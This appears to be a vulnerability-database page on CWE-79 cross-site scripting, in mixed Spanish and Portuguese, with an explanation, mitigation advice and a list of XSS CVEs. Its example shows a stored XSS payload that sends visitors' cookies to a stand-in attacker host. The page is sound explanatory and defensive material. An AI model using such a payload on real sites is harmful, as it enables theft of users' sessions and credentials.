Fallos del tipo CWE-79

28.857 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2021-24425—myStickymenu < 2.5.2 - Authenticated Stored XSSEPSS 0.6%CVE-2021-24426—Backup by 10Web <= 1.0.20 - Reflected Cross-Site Scripting (XSS)EPSS 0.6%CVE-2021-32856MEDIUMMicroweber vulnerable to Cross-site ScriptingEPSS 0.6%CVE-2021-4431LOWmsyk FMDataAPI FMDataAPI_Sample.php cross site scriptingEPSS 0.6%CVE-2021-29434MEDIUMImproper validation of URLs ('Cross-site Scripting') in Wagtail rich text fieldsEPSS 0.6%CVE-2021-24419—WP YouTube Lyte < 1.7.16 - Authenticated Stored XSSEPSS 0.6%CVE-2020-3536MEDIUMCisco SD-WAN vManage Cross-Site Scripting VulnerabilityEPSS 0.6%CVE-2021-24418—Smooth Scroll Page Up/Down Buttons <= 1.4 - Authenticated Stored XSS via psb_positioningEPSS 0.6%CVE-2023-43051MEDIUMIBM Cognos Analytics cross-site scriptingEPSS 0.6%CVE-2023-3565MEDIUMCross-site Scripting (XSS) - Generic in nilsteampassnet/teampassEPSS 0.6%CVE-2020-7546—A CWE-79: Improper Neutralization of Input During Web Page Generation vulnerability exists in EcoStruxureª and SmartStruxureª Power MonitoriEPSS 0.6%CVE-2022-30685MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.6%CVE-2021-36805MEDIUMAkaunting Invoice Footer Persistent XSSEPSS 0.6%CVE-2022-30684MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.6%CVE-2022-30686MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.6%CVE-2022-35664MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.6%CVE-2022-40931MEDIUMdutchcoders Transfer.sh 1.4.0 is vulnerable to Cross Site Scripting (XSS).EPSS 0.6%CVE-2025-8550MEDIUMatjiu pybbs list cross site scriptingEPSS 0.6%CVE-2024-34481MEDIUMdrupal-wiki.com Drupal Wiki before 8.31.1 allows XSS via comments, captions, and image titles of a Wiki page.EPSS 0.6%CVE-2022-30682MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.6%